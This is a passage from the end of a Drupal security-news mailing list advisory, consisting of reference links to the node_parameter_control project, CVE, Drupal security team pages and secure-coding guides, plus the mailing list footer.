[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/node_parameter_control
[5] http://drupal.org/project/node_parameter_control
[6] http://drupal.org/user/36138
[7] http://drupal.org/user/395439
[8] http://drupal.org/contact
[9] http://drupal.org/security-team
[10] http://drupal.org/writing-secure-code
[11] http://drupal.org/security/secure-configuration

___
Security-news mailing list
security-n...@drupal.org
Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news
